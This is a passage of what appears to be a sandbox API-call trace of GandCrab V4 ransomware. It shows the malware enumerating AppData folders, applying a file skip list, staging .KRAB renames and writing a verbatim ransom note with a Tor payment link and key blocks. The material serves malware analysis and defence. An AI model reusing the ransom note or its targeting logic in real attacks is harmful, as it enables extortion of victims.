dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.432] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0076.432] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0076.432] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\d2ca4a08d2ca4dee3d.lock") returned 76 [0076.432] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\word\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x470 [0076.433] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.433] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.433] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\") returned 53 [0076.433] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\*" [0076.434] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0x1023578 [0076.434] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.434] FindNextFileW (in: hFindFile=0x1023578, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.434] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.434] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.434] FindNextFileW (in: hFindFile=0x1023578, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.434] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0076.434] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0076.434] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\d2ca4a08d2ca4dee3d.lock" [0076.434] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.466] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 81 [0076.466] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\d2ca4a08d2ca4dee3d.lock") returned 76 [0076.466] lstrlenW (lpString=".lock") returned 5 [0076.466] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.466] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0076.466] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.467] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.467] FindNextFileW (in: hFindFile=0x1023578, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.467] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0076.467] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0076.467] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\KRAB-DECRYPT.txt" [0076.467] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.467] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\KRAB-DECRYPT.txt.KRAB") returned 74 [0076.467] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\KRAB-DECRYPT.txt") returned 69 [0076.467] lstrlenW (lpString=".txt") returned 4 [0076.467] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.468] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0076.468] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.468] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\KRAB-DECRYPT.txt") returned 69 [0076.468] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\KRAB-DECRYPT.txt") returned 69 [0076.468] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0076.468] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0076.468] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0076.468] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0076.468] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0076.468] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0076.468] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0076.469] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0076.469] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0076.469] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0076.469] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.469] FindNextFileW (in: hFindFile=0x1023578, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0076.469] lstrcmpW (lpString1="STARTUP", lpString2=".") returned 1 [0076.469] lstrcmpW (lpString1="STARTUP", lpString2="..") returned 1 [0076.469] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\", lpString2="STARTUP" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" [0076.469] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\" [0076.469] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0076.469] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0076.470] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0076.470] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0076.470] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0076.470] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.470] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.470] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\\\KRAB-DECRYPT.txt") returned 78 [0076.470] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\word\\startup\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0076.489] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0076.489] WriteFile (in: hFile=0x778, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e820, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e820*=0x1f6e, lpOverlapped=0x0) returned 1 [0076.490] CloseHandle (hObject=0x778) returned 1 [0076.491] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.491] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.492] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x17, wMilliseconds=0x2b8)) [0076.492] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.492] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0076.492] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0076.492] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\d2ca4a08d2ca4dee3d.lock") returned 84 [0076.492] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\word\\startup\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x778 [0076.493] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.493] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.494] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned 61 [0076.494] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*" [0076.494] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*", lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0x10233b8 [0076.494] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.494] FindNextFileW (in: hFindFile=0x10233b8, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0076.494] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.494] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.494] FindNextFileW (in: hFindFile=0x10233b8, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0076.494] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0076.494] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0076.494] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\d2ca4a08d2ca4dee3d.lock" [0076.494] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.495] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 89 [0076.495] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\d2ca4a08d2ca4dee3d.lock") returned 84 [0076.495] lstrlenW (lpString=".lock") returned 5 [0076.495] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.495] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0076.495] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.495] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.496] FindNextFileW (in: hFindFile=0x10233b8, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0076.496] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0076.496] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0076.496] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\KRAB-DECRYPT.txt" [0076.496] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.496] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\KRAB-DECRYPT.txt.KRAB") returned 82 [0076.496] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\KRAB-DECRYPT.txt") returned 77 [0076.496] lstrlenW (lpString=".txt") returned 4 [0076.496] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.497] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".txt ") returned 5 [0076.497] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.498] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\KRAB-DECRYPT.txt") returned 77 [0076.498] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\KRAB-DECRYPT.txt") returned 77 [0076.498] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0076.498] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0076.498] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0076.498] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0076.498] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0076.498] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0076.498] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0076.498] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0076.498] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0076.498] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0076.498] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.498] FindNextFileW (in: hFindFile=0x10233b8, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0076.498] FindClose (in: hFindFile=0x10233b8 | out: hFindFile=0x10233b8) returned 1 [0076.499] CloseHandle (hObject=0x778) returned 1 [0076.499] FindNextFileW (in: hFindFile=0x1023578, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0076.499] FindClose (in: hFindFile=0x1023578 | out: hFindFile=0x1023578) returned 1 [0076.499] CloseHandle (hObject=0x470) returned 1 [0076.499] FindNextFileW (in: hFindFile=0xfbd560, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0076.499] FindClose (in: hFindFile=0xfbd560 | out: hFindFile=0xfbd560) returned 1 [0076.500] CloseHandle (hObject=0x43c) returned 1 [0076.500] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0076.500] lstrcmpW (lpString1="MKJULoiV-xwixtoGWVo.odp", lpString2=".") returned 1 [0076.500] lstrcmpW (lpString1="MKJULoiV-xwixtoGWVo.odp", lpString2="..") returned 1 [0076.500] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="MKJULoiV-xwixtoGWVo.odp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MKJULoiV-xwixtoGWVo.odp") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MKJULoiV-xwixtoGWVo.odp" [0076.500] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0076.500] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MKJULoiV-xwixtoGWVo.odp.KRAB") returned 66 [0076.501] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MKJULoiV-xwixtoGWVo.odp") returned 61 [0076.501] lstrlenW (lpString=".odp") returned 4 [0076.501] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0076.501] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".odp ") returned 5 [0076.501] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.501] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MKJULoiV-xwixtoGWVo.odp") returned 61 [0076.501] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MKJULoiV-xwixtoGWVo.odp") returned 61 [0076.501] lstrcmpiW (lpString1="MKJULoiV-xwixtoGWVo.odp", lpString2="desktop.ini") returned 1 [0076.501] lstrcmpiW (lpString1="MKJULoiV-xwixtoGWVo.odp", lpString2="autorun.inf") returned 1 [0076.501] lstrcmpiW (lpString1="MKJULoiV-xwixtoGWVo.odp", lpString2="ntuser.dat") returned -1 [0076.501] lstrcmpiW (lpString1="MKJULoiV-xwixtoGWVo.odp", lpString2="iconcache.db") returned 1 [0076.502] lstrcmpiW (lpString1="MKJULoiV-xwixtoGWVo.odp", lpString2="bootsect.bak") returned 1 [0076.502] lstrcmpiW (lpString1="MKJULoiV-xwixtoGWVo.odp", lpString2="boot.ini") returned 1 [0076.502] lstrcmpiW (lpString1="MKJULoiV-xwixtoGWVo.odp", lpString2="ntuser.dat.log") returned -1 [0076.502] lstrcmpiW (lpString1="MKJULoiV-xwixtoGWVo.odp", lpString2="thumbs.db") returned -1 [0076.502] lstrcmpiW (lpString1="MKJULoiV-xwixtoGWVo.odp", 